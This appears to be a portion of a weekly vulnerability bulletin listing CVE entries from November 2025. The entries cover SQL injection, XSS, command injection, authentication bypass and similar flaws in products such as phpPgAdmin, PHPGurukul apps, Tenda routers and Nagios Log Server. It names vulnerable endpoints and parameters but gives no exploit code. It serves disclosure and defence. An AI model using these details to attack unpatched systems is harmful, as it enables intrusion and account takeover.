| n/a--openml.org | The openml/openml.org web application version v2.0.20241110 uses predictable MD5-based tokens for critical user workflows such as signup confirmation, password resets, email confirmation resends, and email change confirmation. These tokens are generated by hashing the current timestamp formatted as "%d %H:%M:%S" without incorporating any user-specific data or cryptographic randomness. This predictability allows remote attackers to brute-force valid tokens within a small time window, enabling unauthorized account confirmation, password resets, and email change approvals, potentially leading to account takeover. | 2025-11-18 | not yet calculated | CVE-2025-55796 | https://github.com/openml https://github.com/openml/openml.org https://github.com/openml/openml.org/security/advisories/GHSA-xfjh-gf9p-8qr6   |
| n/a--n/a | A code injection vulnerability exists in baryhuang/mcp-server-aws-resources-python 0.1.0 that allows remote code execution through insufficient input validation in the execute_query method. The vulnerability stems from the exposure of dangerous Python built-in functions (__import__, getattr, hasattr) in the execution namespace and the direct use of exec() to execute user-supplied code. An attacker can craft malicious queries to execute arbitrary Python code, leading to AWS credential theft (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY), file system access, environment variable disclosure, and potential system compromise. The vulnerability allows attackers to bypass intended security controls and gain unauthorized access to sensitive AWS resources and credentials stored in the server's environment. | 2025-11-18 | not yet calculated | CVE-2025-63604 | https://github.com/baryhuang/mcp-server-aws-resources-python/issues/8   |
| n/a--Newtec Celox UHD (models: CELOXA504, CELOXA820) running firmware version celox-21.6.13 | The Newtec Celox UHD (models: CELOXA504, CELOXA820) running firmware version celox-21.6.13 is vulnerable to an authentication bypass. An attacker can exploit this issue by modifying intercepted responses from the /celoxservice endpoint. By injecting a forged response body during the loginWithUserName flow, the attacker can gain Superuser or Operator access without providing valid credentials. | 2025-11-19 | not yet calculated | CVE-2025-63210 | https://www.newtec.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63210_Newtec%20Celox%20UHD%20Authentication%20Bypass%20_%20Privilege%20Escalation   |
| n/a--Open Source Point of Sale 3.4.1 | The password change endpoint in Open Source Point of Sale 3.4.1 allows users to set their account password to an empty string due to missing server-side validation. When an authenticated user omits or leaves the `password` and `repeat_password` parameters empty in the password change request, the backend still returns a successful response and sets the password to an empty string. This effectively disables authentication and may allow unauthorized access to user or administrative accounts. | 2025-11-18 | not yet calculated | CVE-2025-63800 | https://github.com/opensourcepos/opensourcepos https://opensourcepos.org/ https://github.com/omkaryepre/vulnerability-research/tree/main/CVE-2025-63800   |
| n/a--OpenRapid RapidCMS 1.3.1 | OpenRapid RapidCMS 1.3.1 is vulnerable to Cross Site Scripting (XSS) in /system/update-run.php. | 2025-11-17 | not yet calculated | CVE-2025-64046 | http://rapidcms.com https://gist.github.com/b1uel0n3/c8467f156f523fcf16dc572a34693126   |
| n/a--PDFPatcher thru 1.1.3.4663 | The PDFPatcher executable through 1.1.3.4663 does not restrict XML external entity (XXE) references in its XML bookmark import functionality. The application uses .NET's XmlDocument class without disabling external entity resolution, enabling attackers to read arbitrary files from the victim's filesystem, exfiltrate sensitive data via out-of-band (OOB) HTTP requests, perform SSRF attacks against internal network resources, or cause a denial of service via entity expansion attacks. | 2025-11-17 | not yet calculated | CVE-2025-63917 | https://www.cnblogs.com/pdfpatcher https://github.com/wmjordan/PDFPatcher https://github.com/cydtseng/Vulnerability-Research/blob/main/pdfpatcher/XXE-Importers.md |
| n/a--PDFPatcher | The PDFPatcher executable does not validate user-supplied file paths, allowing directory traversal attacks in which attackers write arbitrary files to arbitrary locations. | 2025-11-17 | not yet calculated | CVE-2025-63918 | https://www.cnblogs.com/pdfpatcher https://github.com/wmjordan/PDFPatcher https://github.com/cydtseng/Vulnerability-Research/blob/main/pdfpatcher/DirectoryTraversal-ImageExport.md |
| n/a--PHPGurukul Complaint Management System 2.0 | PHPGurukul Complaint Management System 2.0 is vulnerable to SQL Injection via the email and mobileno parameters in reset-password.php. | 2025-11-17 | not yet calculated | CVE-2024-44654 | https://phpgurukul.com/complaint-management-sytem https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44654.md   |
| n/a--PHPGurukul Complaint Management System 2.0 | PHPGurukul Complaint Management System 2.0 is vulnerable to Cross Site Scripting (XSS) via the search parameter in user-search.php. | 2025-11-17 | not yet calculated | CVE-2024-44655 | https://phpgurukul.com/complaint-management-sytem https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44655.md   |
| n/a--PHPGurukul Complaint Management System 2.0 | PHPGurukul Complaint Management System 2.0 is vulnerable to SQL Injection via the fromdate and todate parameters in between-date-userreport.php. | 2025-11-17 | not yet calculated | CVE-2024-44657 | https://phpgurukul.com/complaint-management-sytem https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44657.md   |
| n/a--PHPGurukul Complaint Management System 2.0 | PHPGurukul Complaint Management System 2.0 is vulnerable to SQL Injection via the subcategory and category parameters in subcategory.php. | 2025-11-17 | not yet calculated | CVE-2024-44658 | https://phpgurukul.com/complaint-management-sytem https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44658.md   |
| n/a--PHPGurukul Complaint Management System 2.0 | PHPGurukul Complaint Management System 2.0 is vulnerable to Cross Site Scripting (XSS) via the fromdate and todate parameters in between-date-userreport.php. | 2025-11-17 | not yet calculated | CVE-2024-46335 | https://phpgurukul.com/complaint-management-sytem https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-46335.md |
| n/a--PHPGurukul Online Shopping Portal 2.0 | PHPGurukul Online Shopping Portal 2.0 is vulnerable to SQL Injection via the email parameter in forgot-password.php. | 2025-11-17 | not yet calculated | CVE-2024-44659 | https://phpgurukul.com/shopping-portal-free-download/ https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44659.md   |
| n/a--PHPGurukul Online Shopping Portal 2.0 | PHPGurukul Online Shopping Portal 2.0 is vulnerable to SQL Injection via the fullname, emailid, and contactno parameters in login.php. | 2025-11-17 | not yet calculated | CVE-2024-44660 | https://phpgurukul.com/shopping-portal-free-download/ https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44660.md   |
| n/a--PHPGurukul Online Shopping Portal 2.0 | PHPGurukul Online Shopping Portal 2.0 is vulnerable to Cross Site Scripting (XSS) via the quantity parameter in my-cart.php. | 2025-11-17 | not yet calculated | CVE-2024-44661 | https://phpgurukul.com/shopping-portal-free-download/ https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44661.md   |
| n/a--PHPGurukul Online Shopping Portal 2.0 | PHPGurukul Online Shopping Portal 2.0 is vulnerable to SQL Injection via the username parameter in the admin page. | 2025-11-17 | not yet calculated | CVE-2024-44662 | https://phpgurukul.com/shopping-portal-free-download/ https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44662.md   |
| n/a--PHPGurukul Online Shopping Portal 2.0 | PHPGurukul Online Shopping Portal 2.0 is vulnerable to SQL Injection via the product parameter in search-result.php. | 2025-11-17 | not yet calculated | CVE-2024-44663 | https://phpgurukul.com/shopping-portal-free-download/ https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44663.md   |
| n/a--PHPGurukul Online Shopping Portal 2.0 | PHPGurukul Online Shopping Portal 2.0 is vulnerable to SQL Injection via the name, summary, review, quality, price, and value parameters in product-details.php. | 2025-11-17 | not yet calculated | CVE-2024-44664 | https://phpgurukul.com/shopping-portal-free-download/ https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44664.md   |
| n/a--PHPGurukul Small CRM 3.0 | PHPGurukul Small CRM 3.0 is vulnerable to SQL Injection via the oldpass parameter in change-password.php. | 2025-11-17 | not yet calculated | CVE-2024-44641 | https://phpgurukul.com/small-crm-php/ https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44641.md   |
| n/a--PHPGurukul Small CRM 3.0 | PHPGurukul Small CRM 3.0 is vulnerable to SQL Injection via the frm_id and aremark parameters in manage-tickets.php. | 2025-11-17 | not yet calculated | CVE-2024-44644 | https://phpgurukul.com/small-crm-php/ https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44644.md   |
| n/a--PHPGurukul Small CRM 3.0 | PHPGurukul Small CRM 3.0 is vulnerable to Cross Site Scripting (XSS) via the aremark parameter in manage-tickets.php. | 2025-11-17 | not yet calculated | CVE-2024-44647 | https://phpgurukul.com/small-crm-php/ https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44647.md   |
| n/a--PHPGurukul Small CRM 3.0 | PHPGurukul Small CRM 3.0 is vulnerable to SQL Injection via id and adminremark parameters in quote-details.php. | 2025-11-17 | not yet calculated | CVE-2024-44648 | https://phpgurukul.com/small-crm-php/ https://github.com/leexsoyoung/CVEs/blob/main/CVE-2024-44648.md   |
| n/a--PHPGurukul Student Record System v3.2 | A Cross-Site Request Forgery (CSRF) vulnerability in the manage-students.php component of PHPGurukul Student Record System v3.2 allows an attacker to trick an authenticated administrator into submitting a forged request. This leads to the unauthorized deletion of user accounts, causing a Denial of Service (DoS). | 2025-11-18 | not yet calculated | CVE-2025-63955 | https://phpgurukul.com/student-record-system-php/ https://github.com/Wayne-arul/CVE-Disclosures/tree/main/CVE-2025-63955   |
| n/a--phpPgAdmin 7.13.0 | phpPgAdmin 7.13.0 and earlier contains multiple cross-site scripting (XSS) vulnerabilities across various components. User-supplied input from $_REQUEST parameters is reflected in HTML output without proper encoding or sanitization in multiple locations including sequences.php, indexes.php, admin.php, and other unspecified files. An attacker can exploit these vulnerabilities to execute arbitrary JavaScript in victims' browsers, potentially leading to session hijacking, credential theft, or other malicious actions. | 2025-11-20 | not yet calculated | CVE-2025-60796 | https://github.com/phppgadmin/phppgadmin/blob/master/sequences.php#L316 https://github.com/phppgadmin/phppgadmin/blob/master/indexes.php#L29 https://github.com/phppgadmin/phppgadmin/blob/master/admin.php#L35 https://github.com/pr0wl1ng/security-advisories/blob/main/CVE-2025-60796.md   |
| n/a--phpPgAdmin 7.13.0 | phpPgAdmin 7.13.0 and earlier contains a SQL injection vulnerability in dataexport.php at line 118. The application directly executes user-supplied SQL queries from the $_REQUEST['query'] parameter without any sanitization or parameterization via $data->conn->Execute($_REQUEST['query']). An authenticated attacker can exploit this vulnerability to execute arbitrary SQL commands, potentially leading to complete database compromise, data theft, or privilege escalation. | 2025-11-20 | not yet calculated | CVE-2025-60797 | https://github.com/phppgadmin/phppgadmin/blob/master/dataexport.php#L118 https://github.com/pr0wl1ng/security-advisories/blob/main/CVE-2025-60797.md   |
| n/a--phpPgAdmin 7.13.0 | phpPgAdmin 7.13.0 and earlier contains a SQL injection vulnerability in display.php at line 396. The application passes user-controlled input from $_REQUEST['query'] directly to the browseQuery function without proper sanitization. An authenticated attacker can exploit this vulnerability to execute arbitrary SQL commands through malicious query manipulation, potentially leading to complete database compromise. | 2025-11-20 | not yet calculated | CVE-2025-60798 | https://github.com/phppgadmin/phppgadmin/blob/master/display.php#L396 https://github.com/pr0wl1ng/security-advisories/blob/main/CVE-2025-60797.md https://github.com/pr0wl1ng/security-advisories/blob/main/CVE-2025-60798.md   |
| n/a--phpPgAdmin 7.13.0 | phpPgAdmin 7.13.0 and earlier contains an incorrect access control vulnerability in sql.php at lines 68-76. The application allows unauthorized manipulation of session variables by accepting user-controlled parameters ('subject', 'server', 'database', 'queryid') without proper validation or access control checks. Attackers can exploit this to store arbitrary SQL queries in $_SESSION['sqlquery'] by manipulating these parameters, potentially leading to session poisoning, stored cross-site scripting, or unauthorized access to sensitive session data. | 2025-11-20 | not yet calculated | CVE-2025-60799 | https://github.com/phppgadmin/phppgadmin/blob/master/sql.php#L68-L76 https://github.com/pr0wl1ng/security-advisories/blob/main/CVE-2025-60799.md   |
| n/a--Pixeon WebLaudos 25.1 (01) | A reflected cross-site scripting (XSS) vulnerability exists in the password change functionality of Pixeon WebLaudos 25.1 (01). The affected input is the sle_sSenha parameter passed to the loginAlterarSenha.asp file. An attacker can craft a malicious URL that, when visited by a victim, causes arbitrary JavaScript code to be executed in the victim's browser within the security context of the vulnerable application. This issue could allow attackers to steal session cookies, disclose sensitive information, perform unauthorized actions on behalf of the user, or conduct phishing attacks. | 2025-11-19 | not yet calculated | CVE-2025-63243 | https://www.pixeon.com/ https://medium.com/@wagneralves_87750/cve-2025-63243-reflected-cross-site-scripting-in-loginalterarsenha-asp-via-sle-slogin-parameter-53808fbbeeee |
| n/a--pnetlab 5.3.11 | pnetlab 5.3.11 is vulnerable to Command Injection via the qemu_options parameter. | 2025-11-18 | not yet calculated | CVE-2025-63749 | https://github.com/XunMInt/cve/blob/main/Pnetlab-20251013.md   |
| n/a--QaTraq 6.9.2 | QaTraq 6.9.2 allows authenticated users to upload arbitrary files via the "Add Attachment" feature in the "Test Script" module. The application fails to restrict file types, enabling the upload of executable PHP files. Once uploaded, the file can be accessed through the "View Attachment" option, which executes the PHP payload on the server. | 2025-11-17 | not yet calculated | CVE-2025-63748 | http://qatraq.com https://bitsbyamg.com/blog/post/2025/10/19/qatraq-692-default-creds-and-file-upload-rce   |
| n/a--QaTraq 6.9.2 | QaTraq 6.9.2 ships with administrative account credentials which are enabled in default installations and permit immediate login via the web application login page. Because the account provides administrative privileges in the default configuration, an attacker who can reach the login page can gain administrative access. | 2025-11-17 | not yet calculated | CVE-2025-63747 | http://qatraq.com https://bitsbyamg.com/blog/post/2025/10/19/qatraq-692-default-creds-and-file-upload-rce |
| n/a--Qlik Sense Enterprise v14.212.13 | Qlik Sense Enterprise v14.212.13 was discovered to contain an information leak via the /dev-hub/ directory. | 2025-11-20 | not yet calculated | CVE-2025-61138 | https://gist.github.com/Israel0x00/8a81ec98162e9ca8e4a3a6c8b4ef4762   |
| n/a--Quark Cloud Drive v3.23.2 | Quark Cloud Drive v3.23.2 has a DLL Hijacking vulnerability. This vulnerability stems from the insecure loading of system libraries. Specifically, the application does not validate the path or signature of [regsvr32.exe] it loads. An attacker can place a crafted malicious DLL in the application's startup directory, which will be loaded and executed when the user launches the program. | 2025-11-20 | not yet calculated | CVE-2025-63685 | https://github.com/QIU-DIE/CVE/issues/5   |
| n/a--QVidium Opera11 device (firmware version 2.9.0-Ax4x-opera11) | The QVidium Opera11 device (firmware version 2.9.0-Ax4x-opera11) is vulnerable to Remote Code Execution (RCE) due to improper input validation on the /cgi-bin/net_ping.cgi endpoint. An attacker can exploit this vulnerability by sending a specially crafted GET request with a malicious parameter to inject arbitrary commands. These commands are executed with root privileges, allowing attackers to gain full control over the device. This poses a significant security risk to any device running this software. | 2025-11-19 | not yet calculated | CVE-2025-63213 | https://qvidium.tv/ https://undercodetesting.com/zero-day-vulnerabilities-discovered-in-qvidium-opera11-remote-code-execution-rce-exploit/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63213_QVidium%20Opera11%20RCE   |
| n/a--R.V.R Elettronica TEX | The R.V.R Elettronica TEX product (firmware TEXL-000400, Web GUI TLAN-000400) is vulnerable to broken access control due to improper authentication checks on the /_Passwd.html endpoint. An attacker can send an unauthenticated POST request to change the Admin, Operator, and User passwords, resulting in complete system compromise. | 2025-11-19 | not yet calculated | CVE-2025-63207 | https://www.rvr.it/en/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63207_RVR%20Elettronica%20TEX%20Broken%20Access%20Control   |
| n/a--Requarks Wiki.js 2.5.307 | Requarks Wiki.js 2.5.307 does not properly revoke or invalidate active JWT tokens when a user logs out. As a result, previously issued tokens remain valid and can be reused to access the system, even after logout. This behavior affects session integrity and may allow unauthorized access if a token is compromised. The issue is present in the authentication resolver logic and affects both the GraphQL endpoint and the logout mechanism. | 2025-11-18 | not yet calculated | CVE-2025-56643 | https://github.com/0xBS0D27/CVE-2025-56643   |
| n/a--RichFilemanager v2.7.6 | An arbitrary file upload vulnerability in the /php/UploadHandler.php component of RichFilemanager v2.7.6 allows attackers to execute arbitrary code via uploading a crafted file. | 2025-11-18 | not yet calculated | CVE-2025-63994 | https://github.com/psolom/RichFilemanager/issues/412   |
| n/a--Sencore SMP100 SMP Media Platform (firmware versions V4.2.160, V60.1.4, V60.1.29) | The Sencore SMP100 SMP Media Platform (firmware versions V4.2.160, V60.1.4, V60.1.29) is vulnerable to session hijacking due to improper session management on the /UserManagement.html endpoint. Attackers who are on the same network as the victim and have access to the target's logged-in session can access the endpoint and add new users without any authentication. This allows attackers to gain unauthorized access to the system and perform malicious activities. | 2025-11-18 | not yet calculated | CVE-2025-63226 | https://www.sencore.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63226_Sencore_SMP100_Session_Hijacking   |
| n/a--Snipe-IT v8.3.4 | Snipe-IT v8.3.4 (build 20218) contains a reflected cross-site scripting (XSS) vulnerability in the CSV Import workflow. When an invalid CSV file is uploaded, the application returns a progress_message value that is rendered as raw HTML in the admin interface. An attacker can intercept and modify the POST /livewire/update request to inject arbitrary HTML or JavaScript into the progress_message. Because the server accepts the modified input without sanitization and reflects it back to the user, arbitrary JavaScript executes in the browser of any authenticated admin who views the import page. | 2025-11-20 | not yet calculated | CVE-2025-64027 | https://github.com/grokability/snipe-it https://github.com/cybercrewinc/CVE-2025-64027/   |
| n/a--Sound4 FIRST | The Sound4 FIRST web-based management interface is vulnerable to Remote Code Execution (RCE) via a malicious firmware update package. The update mechanism fails to validate the integrity of manual.sh, allowing an attacker to inject arbitrary commands by modifying this script and repackaging the firmware. | 2025-11-19 | not yet calculated | CVE-2025-63220 | https://www.sound4helpdesk.com/ https://www.sound4helpdesk.com/first-downloads/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63220_Sound4%20FIRST%20RCE   |
| n/a--Sound4 IMPACT | The Sound4 IMPACT web-based management interface is vulnerable to Remote Code Execution (RCE) via a malicious firmware update package. The update mechanism fails to validate the integrity of manual.sh, allowing an attacker to inject arbitrary commands by modifying this script and repackaging the firmware. | 2025-11-18 | not yet calculated | CVE-2025-63215 | https://www.sound4helpdesk.com/ https://www.sound4helpdesk.com/impact-downloads/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63215%20_%20Sound4%20IMPACT%20%20RCE   |
| n/a--SourceCodester AI Font Matcher (nid=18425, 2025-10-10) | Cross-Site Scripting (XSS) vulnerability exists in SourceCodester AI Font Matcher (nid=18425, 2025-10-10) that allows remote attackers to execute arbitrary JavaScript in victims' browsers. The vulnerability occurs in the webfonts API handling mechanism where font family names are not properly sanitized. An attacker can intercept fetch requests to the webfonts endpoint and inject malicious JavaScript payloads through font family names, resulting in session cookie theft, account hijacking, and unauthorized actions performed on behalf of authenticated users. The vulnerability can be exploited by injecting a fetch hook that returns controlled font data containing malicious scripts. | 2025-11-17 | not yet calculated | CVE-2025-63708 | https://www.sourcecodester.com/javascript/18425/ai-font-matcher-using-html-css-and-javascript-source-code.html https://github.com/DylanDavis1/CVE-2025-64708   |
| n/a--SourceCodester Student Grades Management System 1.0 | A vulnerability was determined in SourceCodester Student Grades Management System 1.0. Affected is the function create_classroom of the file /classroom.php of the component My Classrooms Management Page. This manipulation of the argument name/description causes stored cross site scripting. | 2025-11-18 | not yet calculated | CVE-2025-63892 | http://student.com http://sourcecodester.com https://github.com/minhajultaivin/security-advisories/blob/main/CVE-2025-63892.md   |
| n/a--SWISH prolog thru 2.2.0 | Stored cross site scripting (XSS) vulnerability in SWISH prolog thru 2.2.0 allows attackers to execute arbitrary code via a crafted web IDE notebook. | 2025-11-20 | not yet calculated | CVE-2025-63848 | https://github.com/SWI-Prolog https://github.com/coderMohammed1/CVE-2025-63848 |
| n/a--Tenda AC21 V16.03.08.16 | Tenda AC21 V16.03.08.16 is vulnerable to Buffer Overflow in: /goform/SetVirtualServerCfg via the list parameter. | 2025-11-20 | not yet calculated | CVE-2025-65220 | https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN1.md   |
| n/a--Tenda AC21 V16.03.08.16 | Tenda AC21 V16.03.08.16 is vulnerable to Buffer Overflow via the list parameter of /goform/setPptpUserList. | 2025-11-20 | not yet calculated | CVE-2025-65221 | https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN2.md   |
| n/a--Tenda AC21 V16.03.08.16 | Tenda AC21 V16.03.08.16 is vulnerable to Buffer Overflow via the rebootTime parameter of /goform/SetSysAutoRebbotCfg. | 2025-11-20 | not yet calculated | CVE-2025-65222 | https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN3.md   |
| n/a--Tenda AC21 V16.03.08.16 | Tenda AC21 V16.03.08.16 is vulnerable to Buffer Overflow via the urls parameter of /goform/saveParentControlInfo. | 2025-11-20 | not yet calculated | CVE-2025-65223 | https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN4.md   |
| n/a--Tenda AC21 V16.03.08.16 | Tenda AC21 V16.03.08.16 is vulnerable to Buffer Overflow via the deviceId parameter in /goform/saveParentControlInfo. | 2025-11-20 | not yet calculated | CVE-2025-65226 | https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN5.md   |
| n/a--ThinkPHP 5.0.24 | The read function in file thinkphp\library\think\template\driver\File.php in ThinkPHP 5.0.24 contains a remote code execution vulnerability. | 2025-11-20 | not yet calculated | CVE-2025-63888 | https://www.yuque.com/lcc316/df0kgm/mglhbxltgbmzfh2s https://gist.github.com/Master-0-0/0bf54cbb335b586b42b0db0db804e7aa   |
| n/a--ThinkPHP 5.0.24 | The fetch function in file thinkphp\library\think\Template.php in ThinkPHP 5.0.24 allows attackers to read arbitrary files via crafted file path in a template value. | 2025-11-20 | not yet calculated | CVE-2025-63889 | https://www.yuque.com/lcc316/df0kgm/xqkrw5rfz5vqxo9t https://gist.github.com/Master-0-0/dd63209602f04267f1a27a75a064df26   |
| n/a--weijiang1994 university-bbs | An issue was discovered in weijiang1994 university-bbs (aka Blogin) in commit 9e06bab430bfc729f27b4284ba7570db3b11ce84 (2025-01-13). A weak verification code generation mechanism combined with missing rate limiting allows attackers to perform brute-force attacks on verification codes without authentication. Successful exploitation may result in account takeover via password reset or other authentication bypass methods. | 2025-11-20 | not yet calculated | CVE-2025-63807 | https://gist.github.com/Rycarl-Furry/3e93c6f0d48a29518adf341e0fc7e2dd   |
| Nagios--Log Server | Nagios Log Server versions prior to 2026R1.0.1 contain an authenticated command injection vulnerability via the experimental 'Natural Language Queries' feature. Configuration values for this feature are read from the application settings and incorporated into a system command without adequate validation or restriction of special characters. An authenticated user with access to global configuration can abuse these settings to execute arbitrary operating system commands with the privileges of the web server account, leading to compromise of the Log Server host. | 2025-11-17 | not yet calculated | CVE-2025-34322 | https://www.nagios.com/products/security/#log-server https://www.nagios.com/changelog/nagios-log-server/nagios-log-server-2026r1-0-1/ https://www.vulncheck.com/advisories/nagios-log-server-authenticated-command-injection-via-natural-language-queries   |
| Nagios--Log Server | Nagios Log Server versions prior to 2026R1.0.1 are vulnerable to local privilege escalation due to unsafe interaction between sudo rules and file system permissions. The web server account is granted passwordless sudo access to certain maintenance scripts while also being a member of a group that has write access to the directory containing those scripts. A local attacker running as the web server user can replace one of the permitted scripts with a malicious program and then execute it via sudo, resulting in arbitrary code execution with root privileges. | 2025-11-17 | not yet calculated | CVE-2025-34323 | https://www.nagios.com/products/security/#log-server https://www.nagios.com/changelog/nagios-log-server/nagios-log-server-2026r1-0-1/ https://www.vulncheck.com/advisories/nagios-log-server-local-privilege-escalation-via-writable-scripts-and-sudo-rules   |
| NEC Corporation--RakurakuMusen Start EX | DLL Loading vulnerability in NEC Corporation RakurakuMusen Start EX All Versions allows an attacker to manipulate the PC environment to cause unintended operations on the user's device. | 2025-11-19 | not yet calculated | CVE-2025-12852 | https://jpn.nec.com/security-info/secinfo/nv25-007_en.html |
| Nelio Software--Nelio Popups | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nelio Software Nelio Popups nelio-popups allows Stored XSS. This issue affects Nelio Popups: from n/a through <= 1.3.0. | 2025-11-21 | not yet calculated | CVE-2025-66111 | https://vdp.patchstack.com/database/Wordpress/Plugin/nelio-popups/vulnerability/wordpress-nelio-popups-plugin-1-3-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| octolize--Cart Weight for WooCommerce | Missing Authorization vulnerability in octolize Cart Weight for WooCommerce woo-cart-weight allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Cart Weight for WooCommerce: from n/a through <= 1.9.11. | 2025-11-21 | not yet calculated | CVE-2025-66109 | https://vdp.patchstack.com/database/Wordpress/Plugin/woo-cart-weight/vulnerability/wordpress-cart-weight-for-woocommerce-plugin-1-9-11-broken-access-control-vulnerability?_s_id=cve |
| openfga--openfga | OpenFGA is a high-performance and flexible authorization/permission engine built for developers and inspired by Google Zanzibar. OpenFGA v1.4.0 to v1.11.0 ( openfga-0.1.34 <= Helm chart <= openfga-0.2.48, v.1.4.0 <= docker <= v.1.11.0) are vulnerable to improper policy enforcement when certain Check and ListObject calls are executed. This issue has been patched in version 1.11.1. | 2025-11-21 | not yet calculated | CVE-2025-64751 | https://github.com/openfga/openfga/security/advisories/GHSA-2c64-vmv2-hgfc https://github.com/openfga/openfga/releases/tag/v1.11.1   |
| OpenText--uCMDB | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in OpenText uCMDB allows Stored XSS. The vulnerability could allow an attacker who has high-level access to uCMDB to create or update data with malicious scripts. This issue affects uCMDB: 24.4. | 2025-11-19 | not yet calculated | CVE-2025-11884 | https://portal.microfocus.com/s/article/KM000043674?language=en_US |
| OSC--ondemand | Open OnDemand is an open-source HPC portal. Prior to versions 4.0.8 and 3.1.16, Open OnDemand packages create world writable locations in the GEM_PATH. Open OnDemand versions 4.0.8 and 3.1.16 have been patched for this vulnerability. | 2025-11-20 | not yet calculated | CVE-2025-64185 | https://github.com/OSC/ondemand/security/advisories/GHSA-r2cg-hg78-gq9p   |
| pjsip--pjproject | PJSIP is a free and open source multimedia communication library. Prior to version 2.16, Opus PLC may zero-fill the input frame as long as the decoder ptime, while the input frame length, which is based on stream ptime, may be less than that. This issue affects PJSIP users who use the Opus audio codec in receiving direction. The vulnerability can lead to unexpected application termination due to a memory overwrite. This issue has been patched in version 2.16. | 2025-11-21 | not yet calculated | CVE-2025-65102 | https://github.com/pjsip/pjproject/security/advisories/GHSA-w5vr-39x7-h8g5 https://github.com/pjsip/pjproject/commit/6e9bd2e7d25bba26f852771b40693f45da14fa8f   |
| Progress--DataDirect Connect for JDBC for Amazon Redshift | Improper Control of Generation of Code ('Code Injection') vulnerability in Progress DataDirect Connect for JDBC drivers, Progress DataDirect Open Access JDBC driver and Hybrid Data Pipeline allows Remote Code Inclusion. The SpyAttribute connection option implemented by the DataDirect Connect for JDBC drivers, DataDirect Hybrid Data Pipeline JDBC driver and the DataDirect OpenAccess JDBC driver supports an undocumented syntax construct for the option value that if discovered can be used by an attacker. If an application allows an end user to specify a value for the SpyAttributes connection option then an attacker can use the undocumented syntax to cause the driver to load an arbitrary class on the class path and execute a constructor on that class. This issue affects: DataDirect Connect for JDBC for Amazon Redshift: through 6.0.0.001392, fixed in 6.0.0.001541 DataDirect Connect for JDBC for Apache Cassandra: through 6.0.0.000805, fixed in 6.0.0.000833 DataDirect Connect for JDBC for Hive: through 6.0.1.001499, fixed in 6.0.1.001628 DataDirect Connect for JDBC for Apache Impala: through 6.0.0.001155, fixed in 6.0.0.001279 DataDirect Connect for JDBC for Apache SparkSQL: through 6.0.1.001222, fixed in 6.0.1.001344 DataDirect Connect for JDBC Autonomous REST Connector: through 6.0.1.006961, fixed in 6.0.1.007063 DataDirect Connect for JDBC for DB2: through 6.0.0.000717, fixed in 6.0.0.000964 DataDirect Connect for JDBC for Google Analytics 4: through 6.0.0.000454, fixed in 6.0.0.000525 DataDirect Connect for JDBC for Google BigQuery: through 6.0.0.002279, fixed in 6.0.0.002410 DataDirect Connect for JDBC for Greenplum: through 6.0.0.001712, fixed in 6.0.0.001727 DataDirect Connect for JDBC for Informix: through 6.0.0.000690, fixed in 6.0.0.0851 DataDirect Connect for JDBC for Microsoft Dynamics 365: through 6.0.0.003161, fixed in 6.0.0.3198 DataDirect Connect for JDBC for Microsoft SQLServer: through 6.0.0.001936, fixed in 6.0.0.001957 DataDirect Connect for JDBC for Microsoft Sharepoint: through 6.0.0.001559, fixed in 6.0.0.001587 DataDirect Connect for JDBC for MongoDB: through 6.1.0.001654, fixed in 6.1.0.001669 DataDirect Connect for JDBC for MySQL: through 5.1.4.000330, fixed in 5.1.4.000364 DataDirect Connect for JDBC for Oracle Database: through 6.0.0.001747, fixed in 6.0.0.001776 DataDirect Connect for JDBC for Oracle Eloqua: through 6.0.0.001438, fixed in 6.0.0.001458 DataDirect Connect for JDBC for Oracle Sales Cloud: through 6.0.0.001225, fixed in 6.0.0.001316 DataDirect Connect for JDBC for Oracle Service Cloud: through 5.1.4.000298, fixed in 5.1.4.000309 DataDirect Connect for JDBC for PostgreSQL: through 6.0.0.001843, fixed in 6.0.0.001856 DataDirect Connect for JDBC for Progress OpenEdge: through 5.1.4.000187, fixed in 5.1.4.000189 DataDirect Connect for JDBC for Salesforce: through 6.0.0.003020, fixed in 6.0.0.003125 DataDirect Connect for JDBC for SAP HANA: through 6.0.0.000879, product retired DataDirect Connect for JDBC for SAP S/4 HANA: through 6.0.1.001818, fixed in 6.0.1.001858 DataDirect Connect for JDBC for Sybase ASE: through 5.1.4.000161, fixed in 5.1.4.000162 DataDirect Connect for JDBC for Snowflake: through 6.0.1.001821, fixed in 6.0.1.001856 DataDirect Hybrid Data Pipeline Server: through 4.6.2.3309, fixed in 4.6.2.3430 DataDirect Hybrid Data Pipeline JDBC Driver: through 4.6.2.0607, fixed in 4.6.2.1023 DataDirect Hybrid Data Pipeline On Premises Connector: through 4.6.2.1223, fixed in 4.6.2.1339 DataDirect Hybrid Data Pipeline Docker: through 4.6.2.3316, fixed in 4.6.2.3430 DataDirect OpenAccess JDBC Driver: through 8.1.0.0177, fixed in 